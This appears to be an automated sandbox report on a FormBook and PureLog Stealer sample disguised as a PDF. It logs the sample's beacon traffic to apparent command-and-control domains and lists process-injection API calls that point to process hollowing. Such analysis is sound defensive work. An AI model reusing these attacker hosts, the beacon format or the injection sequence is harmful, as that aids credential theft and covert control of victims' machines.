                                                                                      Nov 25, 2024 13:58:46.112874031 CET  514  OUT  GET /2qq5/?UbRxm=nJlPXscYNUK/x8n7HNvxQXymHirKKOa5d/gbSo8R0WshpRq0xpi0L/Z346LJbhmS5oNKw9fZ+xJ2aA6R/PeeOGlkwsFyxNt6h/Yl654mufiUH4F6GX917Tf2jY4/Q+imsA==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.iner-tech.online
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:47.503057957 CET  1236  IN  HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Mon, 25 Nov 2024 12:58:47 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      45  192.168.2.8  49762  199.59.243.227  80  6380  C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 25, 2024 13:58:54.294629097 CET  767  OUT  POST /3agz/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.oztalkshw.store
                                                                                      Origin: http://www.oztalkshw.store
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.oztalkshw.store/3agz/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:55.373055935 CET  1236  IN  HTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:58:54 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1126
                                                                                      x-request-id: c187ec25-ece2-49c1-9fe2-769a252d629d
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==
                                                                                      set-cookie: parking_session=c187ec25-ece2-49c1-9fe2-769a252d629d; expires=Mon, 25 Nov 2024 13:13:55 GMT; path=/
                                                                                      connection: close


                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                      46  192.168.2.8  49763  199.59.243.227  80  6380  C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                      Nov 25, 2024 13:58:57.165107965 CET  787  OUT  POST /3agz/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.oztalkshw.store
                                                                                      Origin: http://www.oztalkshw.store
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.oztalkshw.store/3agz/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:58:58.413799047 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:58:57 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1126
                                                                                      x-request-id: e9a5b70b-6a60-47ec-8bf8-89517e62f063
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==
                                                                                      set-cookie: parking_session=e9a5b70b-6a60-47ec-8bf8-89517e62f063; expires=Mon, 25 Nov 2024 13:13:58 GMT; path=/
                                                                                      connection: close
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:58:58.413882017 CET | 579 | IN
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZTlhNWI3MGItNmE2MC00N2VjLThiZjgtODk1MTdlNjJmMDYzIiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      47 | 192.168.2.8 | 49764 | 199.59.243.227 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:58:59.836966991 CET | 1804 | OUT | POST /3agz/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.oztalkshw.store
                                                                                      Origin: http://www.oztalkshw.store
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.oztalkshw.store/3agz/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Ascii: UbRxm= [TRUNCATED]
                                                                                      Nov 25, 2024 13:59:00.945743084 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:59:00 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1126
                                                                                      x-request-id: d14c45fd-2d7b-434c-8dc6-00ed3850f059
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==
                                                                                      set-cookie: parking_session=d14c45fd-2d7b-434c-8dc6-00ed3850f059; expires=Mon, 25 Nov 2024 13:14:00 GMT; path=/
                                                                                      connection: close
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAPZPJLM10nHtxjvQ0fGtV16bPN0t9j3bGDtYHLrMqbkz14+yRjitYz4diiRR8W0s0LfjcnLpb/2LxG8HVulUg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:59:00.945884943 CET | 579 | IN
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDE0YzQ1ZmQtMmQ3Yi00MzRjLThkYzYtMDBlZDM4NTBmMDU5IiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      48 | 192.168.2.8 | 49765 | 199.59.243.227 | 80 | 6380 | C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 25, 2024 13:59:02.500936985 CET | 513 | OUT | GET /3agz/?YvA4=xnL8AvI8CJiPEDU&UbRxm=M9KkYvXJQvTAdDL0N809Af0gFgx9ZbNQHhlIdroNnVkJjfd2I5bhi/bs41o8FjJgMZ4GFKyENsY1nw3d8RcMg+XWHrwZPIIO2wtMzeZ/v8QmuglPj4pAgM6ngctNURE5tA== HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.oztalkshw.store
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:59:03.636507988 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                      date: Mon, 25 Nov 2024 12:59:03 GMT
                                                                                      content-type: text/html; charset=utf-8
                                                                                      content-length: 1514
                                                                                      x-request-id: a0f4e7ad-6205-43b8-bc66-b0f65670461b
                                                                                      cache-control: no-store, max-age=0
                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAV1XxGUJnJ9F7V0zrTN1wZ37258VFA5uKMiQUXFR4asXq9rIuF4X06+idGP8fdTz5LaqqR0ho3fY3ddUYMGCw==
                                                                                      set-cookie: parking_session=a0f4e7ad-6205-43b8-bc66-b0f65670461b; expires=Mon, 25 Nov 2024 13:14:03 GMT; path=/
                                                                                      connection: close
                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rAV1XxGUJnJ9F7V0zrTN1wZ37258VFA5uKMiQUXFR4asXq9rIuF4X06+idGP8fdTz5LaqqR0ho3fY3ddUYMGCw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                      Nov 25, 2024 13:59:03.636657000 CET | 967 | IN
                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTBmNGU3YWQtNjIwNS00M2I4LWJjNjYtYjBmNjU2NzA0NjFiIiwicGFnZV90aW1lIjoxNzMyNTM5NT


                                                                                      Target ID:0
                                                                                      Start time:07:54:58
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                                                                                      Imagebase:0x8b0000
                                                                                      File size:779'776 bytes
                                                                                      MD5 hash:AD0DA4A07F4866D67B266C8686F76081
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1433265991.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:07:54:59
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe"
                                                                                      Imagebase:0xc60000
                                                                                      File size:779'776 bytes
                                                                                      MD5 hash:AD0DA4A07F4866D67B266C8686F76081
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:07:55:25
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe"
                                                                                      Imagebase:0x730000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:07:55:26
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\mountvol.exe"
                                                                                      Imagebase:0x190000
                                                                                      File size:15'360 bytes
                                                                                      MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:7
                                                                                      Start time:07:55:40
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe"
                                                                                      Imagebase:0x730000
                                                                                      File size:140'800 bytes
                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:11
                                                                                      Start time:07:55:52
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                      Imagebase:0x7ff6d20e0000
                                                                                      File size:676'768 bytes
                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:170
                                                                                        Total number of Limit Nodes:8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED01E
                                                                                        • GetCurrentThread.KERNEL32 ref: 013ED05B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED098
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 013ED0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED01E
                                                                                        • GetCurrentThread.KERNEL32 ref: 013ED05B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 013ED098
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 013ED0F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E7C016
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05E7C016
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 013EAF5E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013E59A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013E59A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E7B7B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05E7B7B0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E7B1CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E7BCC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0

                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED677
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05E7B1CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05E7BCC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0

                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013ED677
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1430941736.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e0000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1445035590.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5e70000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05E7B6CE
                                                                                        Memory Dump Source
